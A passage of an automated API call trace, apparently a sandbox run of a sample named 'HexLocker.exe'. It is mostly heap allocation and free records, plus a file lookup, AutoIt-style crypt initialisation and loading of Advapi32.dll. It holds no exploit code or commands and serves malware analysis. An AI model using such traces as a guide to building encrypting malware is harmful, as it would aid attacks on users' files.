dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0181.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0181.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0181.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0181.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0181.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0181.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0181.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0181.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0181.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0181.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0181.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0181.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0181.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0181.888] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0181.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0181.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0181.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0181.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0181.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0181.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0181.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0181.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0181.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0181.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0181.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0181.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0181.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0181.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0181.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0181.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0181.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0181.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0181.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0181.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0181.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0181.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0181.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0181.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0181.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0181.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0181.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0181.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0181.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0181.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0181.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0181.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0181.889] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0181.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0181.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0181.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0181.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0181.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0181.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0181.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0181.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0181.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0181.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0181.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0181.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0181.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0181.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0181.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0181.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0181.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0181.890] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0181.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0181.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0181.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0181.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0181.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0181.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0181.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0181.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0181.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0181.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0181.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0181.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0181.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0181.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0181.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0181.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0181.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0181.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0181.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0181.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0181.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0181.891] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HexLocker.exe", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe81dffe0, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xe81dffe0, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd3ffc408, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0xc4066, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="HexLocker.exe", cAlternateFileName="HEXLOC~1.EXE")) returned 0xa87290 [0181.891] FindClose (in: hFindFile=0xa87290 | out: hFindFile=0xa87290) returned 1 [0181.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0181.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0181.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0181.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0181.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0181.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0181.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0181.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0181.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0181.892] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0181.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0181.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0181.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0181.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0181.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0181.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0181.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0181.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0181.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0181.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0181.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0181.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0181.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0181.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0181.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0181.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0181.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0181.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0181.893] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0181.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0181.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0181.893] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0181.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0181.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0181.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0181.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0181.893] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0181.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0181.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0181.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0181.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0181.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0181.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0181.894] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0181.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0181.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0181.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0181.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0181.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0181.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0181.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0181.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0181.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0181.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0181.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0181.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0181.894] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0181.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0181.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0181.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0181.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0181.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0181.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0181.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0181.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0181.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0181.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0181.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0181.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0181.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0181.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0181.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0181.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0181.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0181.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0181.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0181.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0181.895] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0181.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0181.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0181.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0181.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0181.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0181.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0181.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0181.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0181.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0181.896] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0181.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0181.896] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0181.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0181.896] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0181.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0181.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0181.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0181.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0181.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0181.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0181.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0181.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0181.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0181.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0181.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0181.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0181.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0181.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0181.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0181.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0181.897] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0181.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0181.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0181.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0181.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0181.897] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0181.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0181.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0181.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0181.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0181.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0181.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0181.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0181.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0181.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0181.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0181.898] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0181.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0181.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0181.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0181.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0181.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0181.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0181.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0181.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0181.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0181.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0181.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0181.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0181.901] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0181.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0181.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0181.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0181.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0181.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0181.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 